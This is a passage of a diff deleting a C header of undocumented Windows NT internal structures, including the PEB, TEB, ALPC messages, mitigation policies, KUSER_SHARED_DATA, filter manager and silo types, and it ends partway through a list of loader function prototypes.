glTable; - WOW64_POINTER(PVOID) glCurrentRC; - WOW64_POINTER(PVOID) glContext; - - NTSTATUS LastStatusValue; - UNICODE_STRING32 StaticUnicodeString; - WCHAR StaticUnicodeBuffer[261]; - - WOW64_POINTER(PVOID) DeallocationStack; - WOW64_POINTER(PVOID) TlsSlots[64]; - LIST_ENTRY32 TlsLinks; -} TEB32, *PTEB32; - -typedef struct _PEB_LDR_DATA { - ULONG Length; - BOOLEAN Initialized; - HANDLE SsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID EntryInProgress; - BOOLEAN ShutdownInProgress; - HANDLE ShutdownThreadId; -} PEB_LDR_DATA, *PPEB_LDR_DATA; - -typedef struct _GDI_HANDLE_ENTRY { - union - { - PVOID Object; - PVOID NextFree; - }; - union - { - struct - { - USHORT ProcessId; - USHORT Lock : 1; - USHORT Count : 15; - }; - ULONG Value; - } Owner; - USHORT Unique; - UCHAR Type; - UCHAR Flags; - PVOID UserPointer; -} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY; - -typedef struct _GDI_SHARED_MEMORY { - GDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT]; -} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY; - -#define FLS_MAXIMUM_AVAILABLE 128 -#define TLS_MINIMUM_AVAILABLE 64 -#define TLS_EXPANSION_SLOTS 1024 - -#define DOS_MAX_COMPONENT_LENGTH 255 -#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5) - -typedef struct _CURDIR { - UNICODE_STRING DosPath; - HANDLE Handle; -} CURDIR, *PCURDIR; - -#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 -#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 - -typedef struct _RTL_DRIVE_LETTER_CURDIR { - USHORT Flags; - USHORT Length; - ULONG TimeStamp; - STRING DosPath; -} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; - -typedef struct _RTL_USER_PROCESS_PARAMETERS { - ULONG MaximumLength; - ULONG Length; - - ULONG Flags; - ULONG DebugFlags; - - HANDLE ConsoleHandle; - ULONG ConsoleFlags; - HANDLE StandardInput; - HANDLE StandardOutput; - HANDLE StandardError; - - CURDIR CurrentDirectory; - UNICODE_STRING DllPath; - UNICODE_STRING ImagePathName; - UNICODE_STRING 
CommandLine; - PVOID Environment; - - ULONG StartingX; - ULONG StartingY; - ULONG CountX; - ULONG CountY; - ULONG CountCharsX; - ULONG CountCharsY; - ULONG FillAttribute; - - ULONG WindowFlags; - ULONG ShowWindowFlags; - UNICODE_STRING WindowTitle; - UNICODE_STRING DesktopInfo; - UNICODE_STRING ShellInfo; - UNICODE_STRING RuntimeData; - RTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; - - ULONG EnvironmentSize; - ULONG EnvironmentVersion; - PVOID PackageDependencyData; //8+ - ULONG ProcessGroupId; - // ULONG LoaderThreads; -} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; - -typedef struct _PEB { - BOOLEAN InheritedAddressSpace; - BOOLEAN ReadImageFileExecOptions; - BOOLEAN BeingDebugged; - union - { - BOOLEAN BitField; - struct - { - BOOLEAN ImageUsesLargePages : 1; - BOOLEAN IsProtectedProcess : 1; - BOOLEAN IsImageDynamicallyRelocated : 1; - BOOLEAN SkipPatchingUser32Forwarders : 1; - BOOLEAN IsPackagedProcess : 1; - BOOLEAN IsAppContainer : 1; - BOOLEAN IsProtectedProcessLight : 1; - BOOLEAN IsLongPathAwareProcess : 1; - }; - }; - HANDLE Mutant; - - PVOID ImageBaseAddress; - PPEB_LDR_DATA Ldr; - PRTL_USER_PROCESS_PARAMETERS ProcessParameters; - PVOID SubSystemData; - PVOID ProcessHeap; - PRTL_CRITICAL_SECTION FastPebLock; - PVOID AtlThunkSListPtr; - PVOID IFEOKey; - union - { - ULONG CrossProcessFlags; - struct - { - ULONG ProcessInJob : 1; - ULONG ProcessInitializing : 1; - ULONG ProcessUsingVEH : 1; - ULONG ProcessUsingVCH : 1; - ULONG ProcessUsingFTH : 1; - ULONG ProcessPreviouslyThrottled : 1; - ULONG ProcessCurrentlyThrottled : 1; - ULONG ProcessImagesHotPatched : 1; - ULONG ReservedBits0 : 24; - }; - ULONG EnvironmentUpdateCount; - }; - union - { - PVOID KernelCallbackTable; - PVOID UserSharedInfoPtr; - }; - ULONG SystemReserved[1]; - ULONG AtlThunkSListPtr32; - PVOID ApiSetMap; - ULONG TlsExpansionCounter; - PVOID TlsBitmap; - ULONG TlsBitmapBits[2]; - PVOID ReadOnlySharedMemoryBase; - PVOID HotpatchInformation; - PVOID 
*ReadOnlyStaticServerData; - PVOID AnsiCodePageData; - PVOID OemCodePageData; - PVOID UnicodeCaseTableData; - - ULONG NumberOfProcessors; - ULONG NtGlobalFlag; - - LARGE_INTEGER CriticalSectionTimeout; - SIZE_T HeapSegmentReserve; - SIZE_T HeapSegmentCommit; - SIZE_T HeapDeCommitTotalFreeThreshold; - SIZE_T HeapDeCommitFreeBlockThreshold; - - ULONG NumberOfHeaps; - ULONG MaximumNumberOfHeaps; - PVOID *ProcessHeaps; - - PVOID GdiSharedHandleTable; - PVOID ProcessStarterHelper; - ULONG GdiDCAttributeList; - - PRTL_CRITICAL_SECTION LoaderLock; - - ULONG OSMajorVersion; - ULONG OSMinorVersion; - USHORT OSBuildNumber; - USHORT OSCSDVersion; - ULONG OSPlatformId; - ULONG ImageSubsystem; - ULONG ImageSubsystemMajorVersion; - ULONG ImageSubsystemMinorVersion; - ULONG_PTR ImageProcessAffinityMask; - GDI_HANDLE_BUFFER GdiHandleBuffer; - PVOID PostProcessInitRoutine; - - PVOID TlsExpansionBitmap; - ULONG TlsExpansionBitmapBits[32]; - - ULONG SessionId; - - ULARGE_INTEGER AppCompatFlags; - ULARGE_INTEGER AppCompatFlagsUser; - PVOID pShimData; - PVOID AppCompatInfo; - - UNICODE_STRING CSDVersion; - - PVOID ActivationContextData; - PVOID ProcessAssemblyStorageMap; - PVOID SystemDefaultActivationContextData; - PVOID SystemAssemblyStorageMap; - - SIZE_T MinimumStackCommit; - - PVOID *FlsCallback; - LIST_ENTRY FlsListHead; - PVOID FlsBitmap; - ULONG FlsBitmapBits[FLS_MAXIMUM_AVAILABLE / (sizeof(ULONG) * 8)]; - ULONG FlsHighIndex; - - PVOID WerRegistrationData; - PVOID WerShipAssertPtr; - PVOID pContextData; - PVOID pImageHeaderHash; - union - { - ULONG TracingFlags; - struct - { - ULONG HeapTracingEnabled : 1; - ULONG CritSecTracingEnabled : 1; - ULONG LibLoaderTracingEnabled : 1; - ULONG SpareTracingBits : 29; - }; - }; - ULONGLONG CsrServerReadOnlySharedMemoryBase; -} PEB, *PPEB; - -typedef struct _TEB_ACTIVE_FRAME_CONTEXT { - ULONG Flags; - PSTR FrameName; -} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; - -typedef struct _TEB_ACTIVE_FRAME { - ULONG Flags; - struct 
_TEB_ACTIVE_FRAME *Previous; - PTEB_ACTIVE_FRAME_CONTEXT Context; -} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; - -#define GDI_BATCH_BUFFER_SIZE 310 - -typedef struct _GDI_TEB_BATCH { - ULONG Offset; - UCHAR Alignment[4]; - ULONG_PTR HDC; - ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; -} GDI_TEB_BATCH, *PGDI_TEB_BATCH; - -typedef struct _TEB { - NT_TIB NtTib; - - PVOID EnvironmentPointer; - CLIENT_ID ClientId; - PVOID ActiveRpcHandle; - PVOID ThreadLocalStoragePointer; - PPEB ProcessEnvironmentBlock; - - ULONG LastErrorValue; - ULONG CountOfOwnedCriticalSections; - PVOID CsrClientThread; - PVOID Win32ThreadInfo; - ULONG User32Reserved[26]; - ULONG UserReserved[5]; - PVOID WOW32Reserved; - LCID CurrentLocale; - ULONG FpSoftwareStatusRegister; - PVOID SystemReserved1[54]; - NTSTATUS ExceptionCode; - PVOID ActivationContextStackPointer; -#if defined(_M_X64) - UCHAR SpareBytes[24]; -#else - UCHAR SpareBytes[36]; -#endif - ULONG TxFsContext; - - GDI_TEB_BATCH GdiTebBatch; - CLIENT_ID RealClientId; - HANDLE GdiCachedProcessHandle; - ULONG GdiClientPID; - ULONG GdiClientTID; - PVOID GdiThreadLocalInfo; - ULONG_PTR Win32ClientInfo[62]; - PVOID glDispatchTable[233]; - ULONG_PTR glReserved1[29]; - PVOID glReserved2; - PVOID glSectionInfo; - PVOID glSection; - PVOID glTable; - PVOID glCurrentRC; - PVOID glContext; - - NTSTATUS LastStatusValue; - UNICODE_STRING StaticUnicodeString; - WCHAR StaticUnicodeBuffer[261]; - - PVOID DeallocationStack; - PVOID TlsSlots[64]; - LIST_ENTRY TlsLinks; - - PVOID Vdm; - PVOID ReservedForNtRpc; - PVOID DbgSsReserved[2]; - - ULONG HardErrorMode; -#if defined(_M_X64) - PVOID Instrumentation[11]; -#else - PVOID Instrumentation[9]; -#endif - GUID ActivityId; - - PVOID SubProcessTag; - PVOID EtwLocalData; - PVOID EtwTraceData; - PVOID WinSockData; - ULONG GdiBatchCount; - - union - { - PROCESSOR_NUMBER CurrentIdealProcessor; - ULONG IdealProcessorValue; - struct - { - UCHAR ReservedPad0; - UCHAR ReservedPad1; - UCHAR ReservedPad2; - UCHAR IdealProcessor; - }; - 
}; - - ULONG GuaranteedStackBytes; - PVOID ReservedForPerf; - PVOID ReservedForOle; - ULONG WaitingOnLoaderLock; - PVOID SavedPriorityState; - ULONG_PTR SoftPatchPtr1; - PVOID ThreadPoolData; - PVOID *TlsExpansionSlots; -#if defined(_M_X64) - PVOID DeallocationBStore; - PVOID BStoreLimit; -#endif - ULONG MuiGeneration; - ULONG IsImpersonating; - PVOID NlsCache; - PVOID pShimData; - ULONG HeapVirtualAffinity; - HANDLE CurrentTransactionHandle; - PTEB_ACTIVE_FRAME ActiveFrame; - PVOID FlsData; - - PVOID PreferredLanguages; - PVOID UserPrefLanguages; - PVOID MergedPrefLanguages; - ULONG MuiImpersonation; - - union - { - USHORT CrossTebFlags; - USHORT SpareCrossTebBits : 16; - }; - union - { - USHORT SameTebFlags; - struct - { - USHORT SafeThunkCall : 1; - USHORT InDebugPrint : 1; - USHORT HasFiberData : 1; - USHORT SkipThreadAttach : 1; - USHORT WerInShipAssertCode : 1; - USHORT RanProcessInit : 1; - USHORT ClonedThread : 1; - USHORT SuppressDebugMsg : 1; - USHORT DisableUserStackWalk : 1; - USHORT RtlExceptionAttached : 1; - USHORT InitialThread : 1; - USHORT SpareSameTebBits : 1; - }; - }; - - PVOID TxnScopeEnterCallback; - PVOID TxnScopeExitCallback; - PVOID TxnScopeContext; - ULONG LockCount; - ULONG SpareUlong0; - PVOID ResourceRetValue; -} TEB, *PTEB; - -typedef struct _PROCESS_DEVICEMAP_INFORMATION { - union { - struct { - HANDLE DirectoryHandle; - } Set; - struct { - ULONG DriveMap; - UCHAR DriveType[32]; - } Query; - }; -} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION; - -__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; } - -/* -** PEB/TEB END -*/ - -/* -** ALPC START -*/ - -typedef struct _PORT_MESSAGE { - union { - struct { - CSHORT DataLength; - CSHORT TotalLength; - } s1; - ULONG Length; - } u1; - union { - struct { - CSHORT Type; - CSHORT DataInfoOffset; - } s2; - ULONG ZeroInit; - } u2; - union { - CLIENT_ID ClientId; - double DoNotUseThisField; // Force quadword alignment - } u3; - ULONG 
MessageId; - union { - ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message - ULONG CallbackId; // Only valid on LPC_REQUEST message - } u4; - UCHAR Reserved[8]; -} PORT_MESSAGE, *PPORT_MESSAGE; - -// end_ntsrv - -typedef struct _PORT_DATA_ENTRY { - PVOID Base; - ULONG Size; -} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY; - -typedef struct _PORT_DATA_INFORMATION { - ULONG CountDataEntries; - PORT_DATA_ENTRY DataEntries[1]; -} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION; - -#define LPC_REQUEST 1 -#define LPC_REPLY 2 -#define LPC_DATAGRAM 3 -#define LPC_LOST_REPLY 4 -#define LPC_PORT_CLOSED 5 -#define LPC_CLIENT_DIED 6 -#define LPC_EXCEPTION 7 -#define LPC_DEBUG_EVENT 8 -#define LPC_ERROR_EVENT 9 -#define LPC_CONNECTION_REQUEST 10 - -#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE) -#define PORT_MAXIMUM_MESSAGE_LENGTH 256 - -typedef struct _LPC_CLIENT_DIED_MSG { - PORT_MESSAGE PortMsg; - LARGE_INTEGER CreateTime; -} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG; - -//#pragma pack(push, 1) -typedef struct _PORT_VIEW { - ULONG Length; - HANDLE SectionHandle; - ULONG SectionOffset; - SIZE_T ViewSize; - PVOID ViewBase; - PVOID ViewRemoteBase; -} PORT_VIEW, *PPORT_VIEW; - -typedef struct _REMOTE_PORT_VIEW { - ULONG Length; - SIZE_T ViewSize; - PVOID ViewBase; -} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; -//#pragma pack(pop) -/* -** ALPC END -*/ - -/* -** MITIGATION POLICY START -*/ - -//redefine enum - -#define ProcessDEPPolicy 0 -#define ProcessASLRPolicy 1 -#define ProcessDynamicCodePolicy 2 -#define ProcessStrictHandleCheckPolicy 3 -#define ProcessSystemCallDisablePolicy 4 -#define ProcessMitigationOptionsMask 5 -#define ProcessExtensionPointDisablePolicy 6 -#define ProcessControlFlowGuardPolicy 7 -#define ProcessSignaturePolicy 8 -#define ProcessFontDisablePolicy 9 -#define ProcessImageLoadPolicy 10 -#define ProcessSystemCallFilterPolicy 11 -#define ProcessPayloadRestrictionPolicy 12 -#define ProcessChildProcessPolicy 13 -#define 
ProcessSideChannelIsolationPolicy 14 - -typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 { - union { - DWORD Flags; - struct { - DWORD MicrosoftSignedOnly : 1; - DWORD StoreSignedOnly : 1; - DWORD MitigationOptIn : 1; - DWORD AuditMicrosoftSignedOnly : 1; - DWORD AuditStoreSignedOnly : 1; - DWORD ReservedFlags : 27; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 { - union { - DWORD Flags; - struct { - DWORD ProhibitDynamicCode : 1; - DWORD AllowThreadOptOut : 1; - DWORD AllowRemoteDowngrade : 1; - DWORD AuditProhibitDynamicCode : 1; - DWORD ReservedFlags : 28; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 { - union { - DWORD Flags; - struct { - DWORD EnableControlFlowGuard : 1; - DWORD EnableExportSuppression : 1; - DWORD StrictMode : 1; - DWORD ReservedFlags : 29; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 { - union { - DWORD Flags; - struct { - DWORD DisableNonSystemFonts : 1; - DWORD AuditNonSystemFontLoading : 1; - DWORD ReservedFlags : 30; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 { - union { - DWORD Flags; - struct { - DWORD NoRemoteImages : 1; - DWORD NoLowMandatoryLabelImages : 1; - DWORD PreferSystem32Images : 1; - DWORD AuditNoRemoteImages : 1; - DWORD AuditNoLowMandatoryLabelImages : 1; - DWORD ReservedFlags : 27; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, 
*PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 { - union { - ULONG Flags; - struct { - ULONG FilterId : 4; - ULONG ReservedFlags : 28; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 { - union { - ULONG Flags; - struct { - ULONG EnableExportAddressFilter : 1; - ULONG AuditExportAddressFilter : 1; - ULONG EnableExportAddressFilterPlus : 1; - ULONG AuditExportAddressFilterPlus : 1; - ULONG EnableImportAddressFilter : 1; - ULONG AuditImportAddressFilter : 1; - ULONG EnableRopStackPivot : 1; - ULONG AuditRopStackPivot : 1; - ULONG EnableRopCallerCheck : 1; - ULONG AuditRopCallerCheck : 1; - ULONG EnableRopSimExec : 1; - ULONG AuditRopSimExec : 1; - ULONG ReservedFlags : 20; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10; - -typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 { - union { - ULONG Flags; - struct { - ULONG NoChildProcessCreation : 1; - ULONG AuditNoChildProcessCreation : 1; - ULONG AllowSecureProcessCreation : 1; - ULONG ReservedFlags : 29; - } DUMMYSTRUCTNAME; - } DUMMYUNIONNAME; -} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10; - -typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION { - PROCESS_MITIGATION_POLICY Policy; - union - { - PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy; - PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy; - PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY SystemCallDisablePolicy; - PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy; - PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy; - PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy; - 
PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy; - PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy; - PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy; - PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy; - PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy; - PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy; - }; -} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION; - -/* -** MITIGATION POLICY END -*/ - -/* -** KUSER_SHARED_DATA START -*/ -#define NX_SUPPORT_POLICY_ALWAYSOFF 0 -#define NX_SUPPORT_POLICY_ALWAYSON 1 -#define NX_SUPPORT_POLICY_OPTIN 2 -#define NX_SUPPORT_POLICY_OPTOUT 3 - -#include -typedef struct _KSYSTEM_TIME { - ULONG LowPart; - LONG High1Time; - LONG High2Time; -} KSYSTEM_TIME, *PKSYSTEM_TIME; -#include - -typedef enum _NT_PRODUCT_TYPE { - NtProductWinNt = 1, - NtProductLanManNt, - NtProductServer -} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; - -#define PROCESSOR_FEATURE_MAX 64 - -typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE { - StandardDesign, // None == 0 == standard design - NEC98x86, // NEC PC98xx series on X86 - EndAlternatives // past end of known alternatives -} ALTERNATIVE_ARCHITECTURE_TYPE; - -// -// Define Address of User Shared Data -// -#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000 - -// -// WARNING: this definition is OS version dependent. -// Structure maybe incomplete. 
-// -#include -typedef struct _KUSER_SHARED_DATA { - - ULONG TickCountLowDeprecated; - ULONG TickCountMultiplier; - - volatile KSYSTEM_TIME InterruptTime; - volatile KSYSTEM_TIME SystemTime; - volatile KSYSTEM_TIME TimeZoneBias; - - USHORT ImageNumberLow; - USHORT ImageNumberHigh; - - WCHAR NtSystemRoot[260]; - - ULONG MaxStackTraceDepth; - ULONG CryptoExponent; - ULONG TimeZoneId; - ULONG LargePageMinimum; - - union { - ULONG Reserved2[7]; - struct { - ULONG AitSamplingValue; - ULONG AppCompatFlag; - struct { - ULONG LowPart; - ULONG HighPart; - } RNGSeedVersion; - ULONG GlobalValidationRunlevel; - LONG TimeZoneBiasStamp; - ULONG NtBuildNumber; - }; - }; - - NT_PRODUCT_TYPE NtProductType; - BOOLEAN ProductTypeIsValid; - UCHAR Reserved0[1]; - USHORT NativeProcessorArchitecture; - - ULONG NtMajorVersion; - ULONG NtMinorVersion; - - BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX]; - ULONG Reserved1; - ULONG Reserved3; - volatile ULONG TimeSlip; - ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture; - ULONG AltArchitecturePad; - LARGE_INTEGER SystemExpirationDate; - ULONG SuiteMask; - BOOLEAN KdDebuggerEnabled; - - union { - UCHAR MitigationPolicies; - struct { - UCHAR NXSupportPolicy : 2; - UCHAR SEHValidationPolicy : 2; - UCHAR CurDirDevicesSkippedForDlls : 2; - UCHAR Reserved : 2; - }; - }; - - UCHAR Reserved6[2]; - - volatile ULONG ActiveConsoleId; - volatile ULONG DismountCount; - ULONG ComPlusPackage; - ULONG LastSystemRITEventTickCount; - ULONG NumberOfPhysicalPages; - BOOLEAN SafeBootMode; - UCHAR VirtualizationFlags; - UCHAR Reserved12[2]; - - union { - ULONG SharedDataFlags; - struct { - ULONG DbgErrorPortPresent : 1; - ULONG DbgElevationEnabled : 1; - ULONG DbgVirtEnabled : 1; - ULONG DbgInstallerDetectEnabled : 1; - ULONG DbgLkgEnabled : 1; - ULONG DbgDynProcessorEnabled : 1; - ULONG DbgConsoleBrokerEnabled : 1; - ULONG DbgSecureBootEnabled : 1; - ULONG DbgMultiSessionSku : 1; - ULONG DbgMultiUsersInSessionSku : 1; - ULONG DbgStateSeparationEnabled : 1; 
- ULONG SpareBits : 21; - }; - }; - ULONG DataFlagsPad[1]; - ULONGLONG TestRetInstruction; - LONGLONG QpcFrequency; - - ULONG SystemCall; - ULONG SystemCallPad0; - - ULONGLONG SystemCallPad[2]; - - union { - volatile KSYSTEM_TIME TickCount; - volatile ULONG64 TickCountQuad; - ULONG ReservedTickCountOverlay[3]; - }; - - ULONG TickCountPad[1]; - - ULONG Cookie; - ULONG CookiedPad; - - ULONG ConsoleSessionForegroundProcessId; - - ULONGLONG TimeUpdateLock; - ULONGLONG BaselineSystemTimeQpc; - ULONGLONG BaselineInterruptTimeQpc; - ULONGLONG QpcSystemTimeIncrement; - ULONGLONG QpcInterruptTimeIncrement; - UCHAR QpcSystemTimeIncrementShift; - UCHAR QpcInterruptTimeIncrementShift; - USHORT UnparkedProcessorCount; - - ULONG EnclaveFeatureMask[4]; - union { - ULONG Reserved8; - ULONG TelemetryCoverageRound; - }; - - USHORT UserModeGlobalLogger[16]; - - ULONG ImageFileExecutionOptions; - ULONG LangGenerationCount; - ULONGLONG Reserved4; - - volatile ULONG64 InterruptTimeBias; - volatile ULONG64 QpcBias; - - ULONG ActiveProcessorCount; - volatile UCHAR ActiveGroupCount; - UCHAR Reserved9; - - union { - USHORT QpcData; - struct { - UCHAR QpcBypassEnabled : 1; - UCHAR QpcShift : 1; - }; - }; - - LARGE_INTEGER TimeZoneBiasEffectiveStart; - LARGE_INTEGER TimeZoneBiasEffectiveEnd; - - XSTATE_CONFIGURATION XState; - -} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA; -#include - -#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA) - -/* -** KUSER_SHARED_DATA END -*/ - -/* -** FLT MANAGER START -*/ - -#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS 0x1 -#define FLTFL_FILTERING_INITIATED 0x2 -#define FLTFL_NAME_PROVIDER 0x4 -#define FLTFL_SUPPORTS_PIPES_MAILSLOTS 0x8 - -#define FLT_OBFL_DRAINING 0x1 -#define FLT_OBFL_ZOMBIED 0x2 -#define FLT_OBFL_TYPE_INSTANCE 0x1000000 -#define FLT_OBFL_TYPE_FILTER 0x2000000 -#define FLT_OBFL_TYPE_VOLUME 0x4000000 - -typedef struct _FLT_OBJECT { - ULONG Flags; - ULONG PointerCount; - EX_RUNDOWN_REF RundownRef; - LIST_ENTRY PrimaryLink; -} 
FLT_OBJECT, *PFLT_OBJECT; - -typedef struct _FLT_SERVER_PORT_OBJECT { - LIST_ENTRY FilterLink; - PVOID ConnectNotify; - PVOID DisconnectNotify; - PVOID MessageNotify; - PVOID Filter; - PVOID Cookie; - ULONG Flags; - ULONG NumberOfConnections; - ULONG MaxConnections; -} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; - -/* -** FLT MANAGER END -*/ - -/* -** SILO START -*/ - -typedef struct _SYSTEM_ROOT_SILO_INFORMATION { - ULONG NumberOfSilos; - ULONG SiloIdList[1]; -} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION; - -typedef struct _SILO_USER_SHARED_DATA { - ULONG64 ServiceSessionId; - ULONG ActiveConsoleId; - LONGLONG ConsoleSessionForegroundProcessId; - NT_PRODUCT_TYPE NtProductType; - ULONG SuiteMask; - ULONG SharedUserSessionId; - BOOLEAN IsMultiSessionSku; - WCHAR NtSystemRoot[260]; - USHORT UserModeGlobalLogger[16]; -} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA; - -typedef struct _OBP_SYSTEM_DOS_DEVICE_STATE { - ULONG GlobalDeviceMap; - ULONG LocalDeviceCount[26]; -} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE; - -typedef struct _OBP_SILODRIVERSTATE { - PDEVICE_MAP SystemDeviceMap; - OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState; - EX_PUSH_LOCK DeviceMapLock; - OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable; -} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE; - -//incomplete, values not important, change between versions. 
-typedef struct _ESERVERSILO_GLOBALS { - OBP_SILODRIVERSTATE ObSiloState; - //incomplete -} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS; - -/* -** SILO END -*/ - -/* -** LDR START -*/ - -typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)( - _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry, - _In_ PVOID Context, - _Inout_ BOOLEAN *StopEnumeration - ); - -typedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)( - _In_ ULONG NotificationReason, - _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData, - _In_opt_ PVOID Context); - -NTSYSAPI -NTSTATUS -NTAPI -LdrAccessResource( - _In_ PVOID DllHandle, - _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry, - _Out_opt_ PVOID *Address, - _Out_opt_ PULONG Size); - -NTSYSAPI -NTSTATUS -NTAPI -LdrAddRefDll( - _In_ ULONG Flags, - _In_ PVOID DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrEnumerateLoadedModules( - _In_opt_ ULONG Flags, - _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction, - _In_opt_ PVOID Context); - -NTSYSAPI -NTSTATUS -NTAPI -LdrFindResource_U( - _In_ PVOID DllHandle, - _In_ CONST ULONG_PTR* ResourceIdPath, - _In_ ULONG ResourceIdPathLength, - _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry); - -NTSYSAPI -NTSTATUS -NTAPI -LdrFindResourceDirectory_U( - _In_ PVOID DllHandle, - _In_ PLDR_RESOURCE_INFO ResourceInfo, - _In_ ULONG Level, - _Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory); - -NTSYSAPI -NTSTATUS -NTAPI -LdrFindEntryForAddress( - _In_ PVOID Address, - _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllHandle( - _In_opt_ PCWSTR DllPath, - _In_opt_ PULONG DllCharacteristics, - _In_ PCUNICODE_STRING DllName, - _Out_ PVOID *DllHandle); - -NTSYSAPI -NTSTATUS -NTAPI -LdrGetDllHandleEx( - _In_ ULONG Flags, - _In_opt_ PWSTR DllPath, - 